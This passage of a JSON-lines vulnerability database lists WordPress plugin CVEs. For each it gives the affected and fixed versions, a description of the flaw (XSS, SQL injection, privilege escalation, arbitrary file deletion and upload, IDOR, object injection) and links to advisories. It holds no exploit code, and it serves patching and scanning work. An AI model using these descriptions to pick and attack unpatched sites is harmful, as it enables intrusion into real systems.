Advisory\"]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3110951?contextall=1\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3110951?contextall=1\",\"refsource\":\"\",\"tags\":[\"Patch\"]}]"}
{"CVE_ID":"CVE-2024-0970","slug":"user-activity-tracking-and-log","versionImpact":"4.1.3","versionEndExcluding":"4.1.4","description":"The User Activity Tracking and Log WordPress plugin before 4.1.4 retrieves client IP addresses from potentially untrusted headers, allowing an attacker to manipulate its value.","recommendation":"Update to version 4.1.4, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/7df6877c-6640-41be-aacb-20c7da61e4db\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/7df6877c-6640-41be-aacb-20c7da61e4db\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13374","slug":"wp-table-manager","versionImpact":"4.1.3","versionEndExcluding":"4.1.4","description":"The WP Table Manager plugin for WordPress is vulnerable to unauthorized access due to a missing capability check on the wptm_getFolders AJAX action in all versions up to, and including, 4.1.3. This makes it possible for authenticated attackers, with Subscriber-level access and above, to read arbitrary file names and directories.","recommendation":"Update to version 4.1.4, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.joomunited.com\\\/wordpress-products\\\/wp-table-manager\",\"name\":\"https:\\\/\\\/www.joomunited.com\\\/wordpress-products\\\/wp-table-manager\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/128bc7ee-9763-415f-b726-0e63d4b62271?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/128bc7ee-9763-415f-b726-0e63d4b62271?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-3292","slug":"user-registration","versionImpact":"4.1.3","versionEndExcluding":"4.1.4","description":"The User Registration & Membership \u2013 Custom Registration Form, Login Form, and User Profile plugin for WordPress is vulnerable to Insecure Direct Object Reference in all versions up to, and including, 4.1.3 via the user_registration_update_profile_details() due to missing validation on the 'user_id' user controlled key. This makes it possible for unauthenticated attackers to update other user's passwords, if they have access to the user ID and email.","recommendation":"Update to version 4.1.4, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/user-registration\\\/tags\\\/4.1.3\\\/includes\\\/class-ur-ajax.php#L323\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/user-registration\\\/tags\\\/4.1.3\\\/includes\\\/class-ur-ajax.php#L323\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3268617\\\/user-registration\\\/trunk\\\/includes\\\/class-ur-ajax.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3268617\\\/user-registration\\\/trunk\\\/includes\\\/class-ur-ajax.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/59a63cd8-9d33-4a2c-a499-5b1ee38c07d6?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/59a63cd8-9d33-4a2c-a499-5b1ee38c07d6?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-3282","slug":"user-registration","versionImpact":"4.1.3","versionEndExcluding":"4.1.4","description":"The User Registration & Membership \u2013 Custom Registration Form, Login Form, and User Profile plugin for WordPress is vulnerable to Insecure Direct Object Reference in all versions up to, and including, 4.1.3 via the user_registration_membership_register_member() due to missing validation on the 'membership_id' user controlled key. This makes it possible for unauthenticated attackers to update any user's membership to any other active or non-active membership type.","recommendation":"Update to version 4.1.4, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3268617\\\/user-registration\\\/trunk\\\/modules\\\/membership\\\/includes\\\/AJAX.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3268617\\\/user-registration\\\/trunk\\\/modules\\\/membership\\\/includes\\\/AJAX.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c525b41c-dca5-442a-927e-4583cb303ed1?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c525b41c-dca5-442a-927e-4583cb303ed1?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11203","slug":"embedpress","versionImpact":"4.1.3","versionEndExcluding":"4.1.4","description":"The EmbedPress \u2013 Embed PDF, 3D Flipbook, Social Feeds, Google Docs, Vimeo, Wistia, YouTube Videos, Audios, Google Maps in Gutenberg Block & Elementor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the \u2018provider_name parameter in all versions up to, and including, 4.1.3 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 4.1.4, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/github.com\\\/WPDevelopers\\\/embedpress\\\/blob\\\/a6aa3339d9dc69ab6f9338ded073e5709173c2d4\\\/EmbedPress\\\/Shortcode.php#L240\",\"name\":\"https:\\\/\\\/github.com\\\/WPDevelopers\\\/embedpress\\\/blob\\\/a6aa3339d9dc69ab6f9338ded073e5709173c2d4\\\/EmbedPress\\\/Shortcode.php#L240\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/github.com\\\/WPDevelopers\\\/embedpress\\\/blob\\\/a6aa3339d9dc69ab6f9338ded073e5709173c2d4\\\/vendor\\\/wpdevelopers\\\/embera\\\/src\\\/Embera\\\/ProviderCollection\\\/ProviderCollectionAdapter.php#L173\",\"name\":\"https:\\\/\\\/github.com\\\/WPDevelopers\\\/embedpress\\\/blob\\\/a6aa3339d9dc69ab6f9338ded073e5709173c2d4\\\/vendor\\\/wpdevelopers\\\/embera\\\/src\\\/Embera\\\/ProviderCollection\\\/ProviderCollectionAdapter.php#L173\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3196371\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3196371\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/167dedfa-36cc-4b01-8ea4-8eda8742953c?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/167dedfa-36cc-4b01-8ea4-8eda8742953c?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-3055","slug":"wp-user-frontend-pro","versionImpact":"4.1.3","versionEndExcluding":"4.1.4","description":"The WP User Frontend Pro plugin for WordPress is vulnerable to arbitrary file deletion due to insufficient file path validation in the delete_avatar_ajax() function in all versions up to, and including, 4.1.3. This makes it possible for authenticated attackers, with Subscriber-level access and above, to delete arbitrary files on the server, which can easily lead to remote code execution when the right file is deleted (such as wp-config.php).","recommendation":"Update to version 4.1.4, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/headwayapp.co\\\/wp-user-frontend-changelog\",\"name\":\"https:\\\/\\\/headwayapp.co\\\/wp-user-frontend-changelog\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/eeb71c31-9e56-4b58-9cfc-a97f6892cc2b?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/eeb71c31-9e56-4b58-9cfc-a97f6892cc2b?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-3054","slug":"wp-user-frontend-pro","versionImpact":"4.1.3","versionEndExcluding":"4.1.4","description":"The WP User Frontend Pro plugin for WordPress is vulnerable to arbitrary file uploads due to missing file type validation in the upload_files() function in all versions up to, and including, 4.1.3. This makes it possible for authenticated attackers, with Subscriber-level access and above, to upload arbitrary files on the affected site's server which may make remote code execution possible. Please note that this requires the 'Private Message' module to be enabled and the Business version of the PRO software to be in use.","recommendation":"Update to version 4.1.4, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/headwayapp.co\\\/wp-user-frontend-changelog\",\"name\":\"https:\\\/\\\/headwayapp.co\\\/wp-user-frontend-changelog\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/989f0e0b-8a57-4435-95b0-21fec215112d?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/989f0e0b-8a57-4435-95b0-21fec215112d?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-5326","slug":"ultimate-post","versionImpact":"4.1.2","versionEndExcluding":"4.1.3","description":"The Post Grid Gutenberg Blocks and WordPress Blog Plugin \u2013 PostX plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the 'postx_presets_callback' function in all versions up to, and including, 4.1.2. This makes it possible for authenticated attackers, with Contributor-level access and above, to change arbitrary options on affected sites. This can be used to enable new user registration and set the default role for new users to Administrator.","recommendation":"Update to version 4.1.3, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/07a3db33-3787-4b63-835d-8e3026206842?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/07a3db33-3787-4b63-835d-8e3026206842?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ultimate-post\\\/trunk\\\/classes\\\/Styles.php#L160\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ultimate-post\\\/trunk\\\/classes\\\/Styles.php#L160\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ultimate-post\\\/trunk\\\/classes\\\/Styles.php#L177\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ultimate-post\\\/trunk\\\/classes\\\/Styles.php#L177\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3093815\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3093815\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-8671","slug":"woo-events","versionImpact":"4.1.2","versionEndExcluding":"4.1.3","description":"The WooEvents - Calendar and Event Booking plugin for WordPress is vulnerable to arbitrary file overwrite due to insufficient file path validation in the inc\/barcode.php file in all versions up to, and including, 4.1.2. This makes it possible for unauthenticated attackers to overwrite arbitrary files on the server, which can easily lead to remote code execution when the right file is deleted (such as wp-config.php).","recommendation":"Update to version 4.1.3, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/3d7af96a-5a3c-4291-a369-f6ed78f72a3f?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/3d7af96a-5a3c-4291-a369-f6ed78f72a3f?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/codecanyon.net\\\/item\\\/wooevents-calendar-and-event-booking\\\/15598178\",\"name\":\"https:\\\/\\\/codecanyon.net\\\/item\\\/wooevents-calendar-and-event-booking\\\/15598178\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-4643","slug":"enable-media-replace","versionEndExcluding":"4.1.3","description":"The Enable Media Replace WordPress plugin before 4.1.3 unserializes user input via the Remove Background feature, which could allow Author+ users to perform PHP Object Injection when a suitable gadget is present on the blog","recommendation":"Update to version 4.1.3, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/d9125604-2236-435c-a67c-07951a1fc5b1\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/d9125604-2236-435c-a67c-07951a1fc5b1\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-2594","slug":"user-registration","versionImpact":"4.1.2","versionEndExcluding":"4.1.3","description":"The User Registration & Membership  WordPress plugin before 4.1.3 does not properly validate data in an AJAX action when the Membership Addon is enabled, allowing attackers to authenticate as any user, including administrators, by simply using the target account's user ID.","recommendation":"Update to version 4.1.3, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/1c1be47a-d5c0-4ac1-b9fd-475b382a7d8f\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/1c1be47a-d5c0-4ac1-b9fd-475b382a7d8f\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13729","slug":"podlove-podcasting-plugin-for-wordpress","versionImpact":"4.1.23","versionEndExcluding":"4.1.24","description":"The Podlove Podcast Publisher WordPress plugin before 4.1.24 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup).","recommendation":"Update to version 4.1.24, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/2feed26b-ef02-4954-ab9d-8b0f958b0ef1\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/2feed26b-ef02-4954-ab9d-8b0f958b0ef1\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-24796","slug":"mage-eventpress","versionEndExcluding":"4.1.2","description":"Deserialization of Untrusted Data vulnerability in MagePeople Team Event Manager and Tickets Selling Plugin for WooCommerce \u2013 WpEvently \u2013 WordPress Plugin.This issue affects Event Manager and Tickets Selling Plugin for WooCommerce \u2013 WpEvently \u2013 WordPress Plugin: from n\/a through 4.1.1.\n\n","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/mage-eventpress\\\/wordpress-wpevently-plugin-4-1-1-php-object-injection-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/mage-eventpress\\\/wordpress-wpevently-plugin-4-1-1-php-object-injection-vulnerability?_s_id=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-7499","slug":"betterdocs","versionImpact":"4.1.1","versionEndExcluding":"4.1.2","description":"The BetterDocs \u2013 Advanced AI-Driven Documentation, FAQ & Knowledge Base Tool for Elementor & Gutenberg with Encyclopedia, AI Support, Instant Answers plugin for WordPress is vulnerable to unauthorized access of data due to a missing capability check on the get_response function in all versions up to and including 4.1.1. This makes it possible for unauthenticated attackers to retrieve passwords for password-protected documents as well as the metadata of private and draft documents.","recommendation":"Update to version 4.1.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/betterdocs\\\/tags\\\/4.1.0\\\/includes\\\/REST\\\/DocCategories.php#L82\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/betterdocs\\\/tags\\\/4.1.0\\\/includes\\\/REST\\\/DocCategories.php#L82\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3338384\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3338384\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/5231b741-4d02-45b5-b2aa-0d9d3536a416?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/5231b741-4d02-45b5-b2aa-0d9d3536a416?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-25797","slug":"vslider","versionEndExcluding":"4.1.2","description":"Auth. Stored Cross-Site Scripting (XSS) vulnerability in Mr.Vibe vSlider Multi Image Slider for WordPress plugin <=\u00a04.1.2 versions.","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/vslider\\\/wordpress-vslider-multi-image-slider-for-wordpress-plugin-4-1-2-cross-site-scripting-xss?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/vslider\\\/wordpress-vslider-multi-image-slider-for-wordpress-plugin-4-1-2-cross-site-scripting-xss?_s_id=cve\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-4206","slug":"groundhogg","versionImpact":"4.1.1.2","versionEndExcluding":"4.1.2","description":"The WordPress CRM, Email & Marketing Automation for WordPress | Award Winner \u2014 Groundhogg plugin for WordPress is vulnerable to arbitrary file deletion due to insufficient file path validation in the 'process_export_delete' and 'process_import_delete' functions in all versions up to, and including, 4.1.1.2. This makes it possible for authenticated attackers, with Administrator-level access and above, to delete arbitrary files on the server, which can easily lead to remote code execution when the right file is deleted (such as wp-config.php).","recommendation":"Update to version 4.1.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/groundhogg\\\/trunk\\\/admin\\\/tools\\\/tools-page.php#L701\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/groundhogg\\\/trunk\\\/admin\\\/tools\\\/tools-page.php#L701\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/groundhogg\\\/trunk\\\/admin\\\/tools\\\/tools-page.php#L912\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/groundhogg\\\/trunk\\\/admin\\\/tools\\\/tools-page.php#L912\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3289364\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3289364\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0256b4ad-6094-4062-bdf7-c3fc0410557b?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0256b4ad-6094-4062-bdf7-c3fc0410557b?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-2563","slug":"user-registration","versionImpact":"4.1.1","versionEndExcluding":"4.1.2","description":"The User Registration & Membership  WordPress plugin before 4.1.2 does not prevent users to set their account role when the Membership Addon is enabled, leading to a privilege escalation issue and allowing unauthenticated users to gain admin privileges","recommendation":"Update to version 4.1.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/2c0f62a1-9510-4f90-a297-17634e6c8b75\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/2c0f62a1-9510-4f90-a297-17634e6c8b75\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11329","slug":"comfino-payment-gateway","versionImpact":"4.1.1","versionEndExcluding":"4.1.2","description":"The Comfino Payment Gateway plugin for WordPress is vulnerable to Reflected Cross-Site Scripting due to the use of add_query_arg & remove_query_arg without appropriate escaping on the URL in all versions up to, and including, 4.1.1. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","recommendation":"Update to version 4.1.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/comfino-payment-gateway\\\/tags\\\/4.1.0\\\/views\\\/admin\\\/configuration.php#L39\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/comfino-payment-gateway\\\/tags\\\/4.1.0\\\/views\\\/admin\\\/configuration.php#L39\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/006945a3-5f54-4bb8-9522-c832d59624a0?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/006945a3-5f54-4bb8-9522-c832d59624a0?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-5223","slug":"ultimate-post","versionImpact":"4.1.1","versionEndExcluding":"4.1.2","description":"The Post Grid Gutenberg Blocks and WordPress Blog Plugin \u2013 PostX plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's file uploading feature in all versions up to, and including, 4.1.1 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Author-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 4.1.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/7234d4b9-a575-428a-9d08-2dc62ba41c30?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/7234d4b9-a575-428a-9d08-2dc62ba41c30?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ultimate-post\\\/tags\\\/4.0.4\\\/addons\\\/custom_font\\\/Custom_Font.php#L13\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ultimate-post\\\/tags\\\/4.0.4\\\/addons\\\/custom_font\\\/Custom_Font.php#L13\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3093051\\\/ultimate-post\\\/trunk\\\/addons\\\/custom_font\\\/Custom_Font.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3093051\\\/ultimate-post\\\/trunk\\\/addons\\\/custom_font\\\/Custom_Font.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-8352","slug":"social-web-suite","versionImpact":"4.1.11","versionEndExcluding":"4.1.12","description":"The Social Web Suite \u2013 Social Media Auto Post, Social Media Auto Publish plugin for WordPress is vulnerable to Directory Traversal in all versions up to, and including, 4.1.11 via the download_log function. This makes it possible for unauthenticated attackers to read the contents of arbitrary files on the server, which can contain sensitive information.","recommendation":"Update to version 4.1.12, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/78ba132c-b5b4-4999-a0ec-67d17ae2857f?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/78ba132c-b5b4-4999-a0ec-67d17ae2857f?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/social-web-suite\\\/trunk\\\/includes\\\/libs\\\/class-socialwebsuite-log.php#L78\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/social-web-suite\\\/trunk\\\/includes\\\/libs\\\/class-socialwebsuite-log.php#L78\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3155593\\\/social-web-suite\\\/trunk?old=3068377&old_path=%2Fsocial-web-suite%2Ftrunk\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3155593\\\/social-web-suite\\\/trunk?old=3068377&old_path=%2Fsocial-web-suite%2Ftrunk\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13341","slug":"WooCommerce-Multi-Locations-Inventory-Management","versionImpact":"4.1.11","versionEndExcluding":"4.1.12","description":"The MultiLoca - WooCommerce Multi Locations Inventory Management plugin for WordPress is vulnerable to SQL Injection via the 'data-id' parameter in all versions up to, and including, 4.1.11 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query.  This makes it possible for authenticated attackers, with Subscriber-level access and above, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.","recommendation":"Update to version 4.1.12, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/codecanyon.net\\\/item\\\/woocommerce-multi-locations-inventory-management\\\/28949586\",\"name\":\"https:\\\/\\\/codecanyon.net\\\/item\\\/woocommerce-multi-locations-inventory-management\\\/28949586\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/8bb172cc-b7a6-401d-a246-1918702d654d?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/8bb172cc-b7a6-401d-a246-1918702d654d?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2021-4331","slug":"theplus_elementor_addon","versionEndExcluding":"4.1.10","description":"The Plus Addons for Elementor plugin for WordPress is vulnerable to privilege escalation in versions up to, and including 4.1.9 (pro) and 2.0.6 (free). The plugin adds a registration form to the Elementor page builders functionality. As part of the registration form, users can choose which role to set as the default for users upon registration. This field is not hidden for lower-level users so any user with access to the Elementor page builder, such as contributors, can set the default role to administrator. Since contributors can not publish posts, only author+ users can elevate privileges without interaction via a site administrator (to approve a post).","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/96388c82-2392-42b3-b0a0-c3d92910fb5c\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/96388c82-2392-42b3-b0a0-c3d92910fb5c\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=2514618%40the-plus-addons-for-elementor-page-builder&new=2514618%40the-plus-addons-for-elementor-page-builder&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=2514618%40the-plus-addons-for-elementor-page-builder&new=2514618%40the-plus-addons-for-elementor-page-builder&sfp_email=&sfph_mail=\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2021-4332","slug":"theplus_elementor_addon","versionEndExcluding":"4.1.10","description":"The Plus Addons for Elementor plugin for WordPress is vulnerable to arbitrary file reads in versions up to, and including 4.1.9 (pro) and 2.0.6 (free). The plugin has a feature to add an \"Info Box\" to an Elementor created page. This Info Box can include an SVG image for the box. Unfortunately, the plugin used file_get_contents with no verification that the file being supplied was an SVG file, so any user with access to the Elementor page builder, such as contributors, could read arbitrary files on the WordPress installation.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=2523506%40the-plus-addons-for-elementor-page-builder&new=2523506%40the-plus-addons-for-elementor-page-builder&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=2523506%40the-plus-addons-for-elementor-page-builder&new=2523506%40the-plus-addons-for-elementor-page-builder&sfp_email=&sfph_mail=\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/aa698e7e-b1c7-4ead-aa2e-7fbfc9dfac80\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/aa698e7e-b1c7-4ead-aa2e-7fbfc9dfac80\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-5003","slug":"ldap-login-for-intranet-sites","versionImpact":"4.1.9","versionEndExcluding":"4.1.10","description":"The Active Directory Integration \/ LDAP Integration WordPress plugin before 4.1.10 stores sensitive LDAP logs in a buffer file when an administrator wants to export said logs. Unfortunately, this log file is never removed, and remains accessible to any users knowing the URL to do so.","recommendation":"Update to version 4.1.10, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/91f4e500-71f3-4ef6-9cc7-24a7c12a5748\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/91f4e500-71f3-4ef6-9cc7-24a7c12a5748\",\"refsource\":\"MISC\",\"tags\":[]}]"}
